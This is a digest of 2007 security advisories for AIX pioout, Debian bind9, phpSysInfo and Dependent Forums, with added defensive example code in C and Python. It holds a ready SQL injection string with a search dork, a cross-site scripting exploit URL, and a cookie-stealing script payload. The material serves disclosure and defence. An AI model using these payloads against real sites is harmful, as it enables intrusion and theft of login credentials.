The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-4004 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

06/05/2007  Initial vendor notification
06/08/2007  Initial vendor response
07/26/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
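The gets() advisory above and the capture advisory earlier in this digest are the same defect in two places: input is accumulated into a fixed stack buffer with nothing bounding the write. The C below is an added example for this page, not AIX or iDefense code. `unbounded_gets()` reproduces the shape of gets() so the bug is visible (it is never called on long input here); `read_line_bounded()` is the replacement a setuid program should use, and the sample input is constructed for the demo, not captured from any system.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() in the demo */
#include <stdio.h>
#include <string.h>

/* The shape of the bug: a gets()-style reader that copies until newline or
 * EOF with no idea how large `buf` is. A line longer than the buffer
 * writes past its end; in a setuid root binary that is a root shell. */
char *unbounded_gets(char *buf, FILE *in) {
    char *p = buf;
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        *p++ = (char)c;              /* no bound: overflows on a long line */
    if (p == buf && c == EOF)
        return NULL;
    *p = '\0';
    return buf;
}

/* Hardened replacement. Never writes beyond `size` bytes, strips the
 * newline, and reports an over-long line rather than silently truncating
 * it (silent truncation would feed the tail of one command back as the
 * start of the next one). */
typedef enum { LINE_OK = 0, LINE_EOF = -1, LINE_TOO_LONG = -2 } line_status;

line_status read_line_bounded(char *buf, size_t size, FILE *in) {
    if (size == 0)
        return LINE_TOO_LONG;
    if (fgets(buf, (int)size, in) == NULL) {
        buf[0] = '\0';
        return LINE_EOF;
    }
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return LINE_OK;
    }
    /* No newline seen: either the final line of the stream or a line that
     * did not fit. Peek one byte to tell the two apart. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return LINE_OK;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;                            /* drain the oversized line */
    buf[0] = '\0';
    return LINE_TOO_LONG;
}

/* Constructed sample input: a short line, a 32-byte line that does not
 * fit a 16-byte buffer, and a final line without a trailing newline. */
static const char sample_input[] =
    "short\n"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
    "tail";

int main(void) {
    FILE *in = fmemopen((void *)sample_input, sizeof sample_input - 1, "r");
    char buf[16];
    line_status st;
    if (in == NULL)
        return 1;
    while ((st = read_line_bounded(buf, sizeof buf, in)) != LINE_EOF)
        printf("%s: \"%s\"\n", st == LINE_OK ? "ok      " : "too long", buf);
    fclose(in);
    return 0;
}
```

Rejecting rather than truncating matters for a command interpreter such as ftp: a truncated line is still a syntactically valid command, so the caller would act on attacker-shaped input without ever learning that something was dropped.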
Dependent Forums (Username Field) Remote SQL Injection
_ A R I A - S E C U R I T Y _

Dependent Forums (Username Field) Remote SQL Injection

DORK: Powered by: Dependent Forums v1.02

Insert your SQL injection code into the Username field. For example:

' union select * from members where member=1

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info
iDefense Security Advisory 07.26.07: IBM AIX pioout Arbitrary Library Loading Vulnerability
IBM AIX pioout Arbitrary Library Loading Vulnerability

iDefense Security Advisory 07.26.07
http://labs.idefense.com/intelligence/vulnerabilities/
Jul 26, 2007

I. BACKGROUND

The pioout program is a setuid root application, installed by default under multiple versions of IBM AIX, that is used to interface with the printer driver. More information can be found at the following URL.

http://publib.boulder.ibm.com/infocenter/pseries/v5r3/topic/com.ibm.aix.cmds/doc/aixcmds4/pioout.htm

II. DESCRIPTION

Local exploitation of an arbitrary library loading vulnerability in the 'pioout' program, as included with IBM Corp.'s AIX operating system, allows an attacker to execute arbitrary code with root privileges.

The vulnerability exists due to the application loading an arbitrary shared library provided by the attacker, without dropping privileges. Using the -R command line argument, an attacker can specify a shared library used to parse data coming from the printer.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with root privileges. The pioout program is setuid root, and executable by any user with local access. To exploit the vulnerability, all an attacker has to do is create a shared library that executes a shell.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in AIX version 5.3 with service pack 6. Previous versions may also be affected.

V. WORKAROUND

Removing the setuid bit from the binary will prevent exploitation, but may make the program unusable by non-root users.

VI. VENDOR RESPONSE

IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below.

http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-4003 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

06/05/2007  Initial vendor notification
06/08/2007  Initial vendor response
07/26/2007  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
[SECURITY] [DSA 1341-2] New bind9 packages fix DNS cache poisoning
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1341-2                      [EMAIL PROTECTED]
http://www.debian.org/security/                         Moritz Muehlenhoff
July 25th, 2007                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : bind9
Vulnerability  : design error
Problem-Type   : remote
Debian-specific: no
CVE ID         : CVE-2007-2926

This update provides fixed packages for the oldstable distribution (sarge). For reference the original advisory text:

Amit Klein discovered that the BIND name server generates predictable DNS query IDs, which may lead to cache poisoning attacks.

For the oldstable distribution (sarge) this problem has been fixed in version 9.2.4-1sarge3. An update for mips, powerpc and hppa is not yet available; they will be released soon.

For the stable distribution (etch) this problem has been fixed in version 9.3.4-2etch1. An update for mips is not yet available; it will be released soon.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your BIND packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3.dsc
    Size/MD5 checksum:     741 1fa2bc8b46a0411cd491c0473105a342
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3.diff.gz
    Size/MD5 checksum:  101841 7adc3b3d1c7c87908a73e7d2456985bb
  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4.orig.tar.gz
    Size/MD5 checksum: 4564219 2ccbddbab59aedd6b8711b628b5472bd

Architecture independent components:

  http://security.debian.org/pool/updates/main/b/bind9/bind9-doc_9.2.4-1sarge3_all.deb
    Size/MD5 checksum:  156958 0340dcd085472e06ec9dad363f80ebeb

Alpha architecture:

  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_alpha.deb
    Size/MD5 checksum:  308078 52d70058f6114eece5f5429dd774fef4
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_alpha.deb
    Size/MD5 checksum:   96950 e057773683872381ec4eff92b14ffcf6
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_alpha.deb
    Size/MD5 checksum:  169214 c8153e9d86913b5a6c0778b4d73fe4b4
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_alpha.deb
    Size/MD5 checksum: 1314552 287a71bed4089bb89edd55f6cb27b62b
  http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_alpha.deb
    Size/MD5 checksum:  523154 6bb71bf02b9d4ef3931745364a97cc19
  http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_alpha.deb
    Size/MD5 checksum:  174190 cc8e2d01bd5abac2cb92b3c9e7962c44
  http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.2.4-1sarge3_alpha.deb
    Size/MD5 checksum:   79570 5ab2753f2227cccf90a59c24bb1eb9c0
  http://security.debian.org/pool/updates/main/b/bind9/libisccfg0_9.2.4-1sarge3_alpha.deb
    Size/MD5 checksum:   94594 136cd50cd8fbc6d9073693938f275d0a
  http://security.debian.org/pool/updates/main/b/bind9/liblwres1_9.2.4-1sarge3_alpha.deb
    Size/MD5 checksum:   97340 99b0751983bf6eef090692e133d0d519
  http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.2.4-1sarge3_alpha.deb
    Size/MD5 checksum:  199658 7cfc1d3c2ea61adb79dddb1f1568c907

AMD64 architecture:

  http://security.debian.org/pool/updates/main/b/bind9/bind9_9.2.4-1sarge3_amd64.deb
    Size/MD5 checksum:  288568 5a5f821c4dfe9e919750ec7877223451
  http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.2.4-1sarge3_amd64.deb
    Size/MD5 checksum:   95946 95faedc2186f40293c46821da0d2ffea
  http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.2.4-1sarge3_amd64.deb
    Size/MD5 checksum:  165168 a9bdb7b12d44748be590bf6292b18aba
  http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.2.4-1sarge3_amd64.deb
    Size/MD5 checksum: 1014760 0f682e95f084eff609e65adde4439164
  http://security.debian.org/pool/updates/main/b/bind9/libdns16_9.2.4-1sarge3_amd64.deb
    Size/MD5 checksum:  490234 3192c3d956d3df8c51e588c45016b0f3
  http://security.debian.org/pool/updates/main/b/bind9/libisc7_9.2.4-1sarge3_amd64.deb
    Size/MD5 checksum:
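The advisory's one-line description, predictable DNS query IDs, is the property a resolver operator can check for directly. The following is an added example, not part of the Debian advisory and not BIND code: it extracts transaction IDs from `tcpdump -n udp port 53` query lines and scores how often the next ID is guessed from the step between the previous two (a counter or counter-plus-constant generator scores 1.0; a uniformly random 16-bit ID scores about 1/65536). This is a generic low-entropy check, not a reimplementation of Amit Klein's attack on BIND's generator; the tcpdump lines and the two ID streams are constructed here.

```python
"""Added example (not part of DSA 1341-2 or of BIND): a generic check for
poorly randomised DNS transaction IDs. Sample data below is constructed.
"""
import random
import re

# Matches the query id in a 'tcpdump -n udp port 53' line such as
#   ... > 192.0.2.53.53: 41325+ A? example.com. (29)
# ('+' is tcpdump's marker for the RD flag; it is absent on non-recursive queries).
TCPDUMP_QUERY = re.compile(r"\.53:\s+(\d{1,5})\+?\s+[A-Z]+\?")

# Constructed tcpdump output, not a real capture.
SAMPLE_TCPDUMP = [
    "12:00:00.000001 IP 192.0.2.10.33121 > 192.0.2.53.53: 41325+ A? example.com. (29)",
    "12:00:00.000101 IP 192.0.2.10.33121 > 192.0.2.53.53: 41326+ A? example.net. (29)",
    "12:00:00.000201 IP 192.0.2.53.53 > 192.0.2.10.33121: 41325 1/0/0 A 192.0.2.80 (45)",
    "12:00:00.000301 IP 192.0.2.10.33121 > 192.0.2.53.53: 41327+ A? example.org. (29)",
]


def ids_from_tcpdump(lines):
    """Transaction IDs of the queries (lines addressed to port 53) in order."""
    ids = []
    for line in lines:
        m = TCPDUMP_QUERY.search(line)
        if m:
            ids.append(int(m.group(1)))
    return ids


def fixed_step_guess_rate(ids):
    """Fraction of IDs an observer predicts as (previous + last step) mod 2^16.

    Catches sequential and constant-increment generators. Two observed queries
    are enough to predict the third, which is what a poisoner needs."""
    if len(ids) < 3:
        return 0.0
    hits = 0
    for prev2, prev, cur in zip(ids, ids[1:], ids[2:]):
        step = (prev - prev2) & 0xFFFF
        if (prev + step) & 0xFFFF == cur:
            hits += 1
    return hits / (len(ids) - 2)


def unique_ratio(ids):
    """Distinct IDs over total; repeats in a short sample are another warning sign."""
    return len(set(ids)) / len(ids) if ids else 0.0


def is_predictable(ids, guess_threshold=0.05):
    """True when the fixed-step predictor succeeds far more often than chance."""
    return fixed_step_guess_rate(ids) >= guess_threshold


# Constructed ID streams for comparison (not captured from any resolver).
def counter_ids(start, n):
    """A resolver that just increments its query id."""
    return [(start + i) & 0xFFFF for i in range(n)]


def random_ids(seed, n):
    """A resolver drawing uniformly random 16-bit ids (seeded for repeatability)."""
    rng = random.Random(seed)
    return [rng.randrange(0x10000) for _ in range(n)]


if __name__ == "__main__":
    print("ids in sample capture:", ids_from_tcpdump(SAMPLE_TCPDUMP))
    for name, ids in [("counter", counter_ids(41325, 500)), ("random", random_ids(7, 1000))]:
        print(name, "guess rate %.4f" % fixed_step_guess_rate(ids),
              "unique %.3f" % unique_ratio(ids), "predictable:", is_predictable(ids))
```

To run it against a real resolver, point a capture at the resolver's outbound queries (the IDs it chooses, not the IDs clients send it), feed the lines to `ids_from_tcpdump`, and treat any guess rate well above chance as a reason to patch; a rate near zero does not prove the generator is sound, since a weak generator can fail this simple predictor and still be attackable.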
PHPSysInfo Index.php Cross Site Scripting
[HSC] PHPSysInfo Index.php Cross Site Scripting

PhpSysInfo is a PHP script that displays information about the host being accessed.

An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials or perform actions in the application as the victim.

Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz
Class: Input Validation Error
Remote: Yes
Local: N/A
Product: PHPSysInfo
Version: phpSysInfo-2.5.4 (other versions may also be vulnerable)
Vendor: http://phpsysinfo.sourceforge.net/

No exploit code is needed; an attacker can exploit this issue via a web client by sending the victim a link of the form below, with script in place of XSS.

Exploit:
http://www.Site.com/phpsysinfo-path/index.php/XSS

Only by becoming a hacker can you stop a hacker. Where can you learn without having to pay thousands? http://kit.hackerscenter.com - The most comprehensive security pack you will ever find on the net!
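The advisory shows the payload placed after `index.php/`, which reaches the script as PATH_INFO. The following is an added example, not phpSysInfo's code: a hypothetical handler that reflects the request path into a self-referencing link, the same handler with HTML escaping, and a check that distinguishes them on a script payload. The payload string and the link markup are assumptions; the only fact taken from the advisory is that text appended after `index.php/` is reflected unescaped.

```python
"""Added example (not phpSysInfo's code): reflecting PATH_INFO into HTML
is a cross-site scripting sink; html.escape neutralises it.
"""
import html

# Assumed payload for the XSS placeholder in the advisory's URL; it first closes
# the href attribute, then opens a script element.
PAYLOAD = '/"><script>alert(document.cookie)</script>'


def vulnerable_page(path_info):
    """Hypothetical stand-in for index.php: builds a link to itself from the
    raw request path (assumed behaviour, mirroring the reported bug)."""
    return '<a href="index.php%s">refresh</a>' % path_info


def safe_page(path_info):
    """Same link with the path HTML-escaped; quote=True also escapes the
    double quote, so the attribute cannot be broken out of."""
    return '<a href="index.php%s">refresh</a>' % html.escape(path_info, quote=True)


def contains_script_element(page):
    """Crude detector for the demo: does a literal <script tag reach the markup?"""
    return "<script" in page.lower()


def reflected_unescaped(render, path_info=PAYLOAD):
    """True when render(path_info) echoes the payload as live markup."""
    return contains_script_element(render(path_info))


if __name__ == "__main__":
    print("vulnerable:", vulnerable_page(PAYLOAD))
    print("safe:      ", safe_page(PAYLOAD))
```

The fix is to escape at the output point, as `safe_page` does; filtering the word "XSS" or a particular tag from the path does not help, because the attacker controls the whole segment. Since the payload travels in the URL path rather than a query string, it also survives in proxies and logs that strip only query parameters, which is worth remembering when hunting for exploitation in access logs.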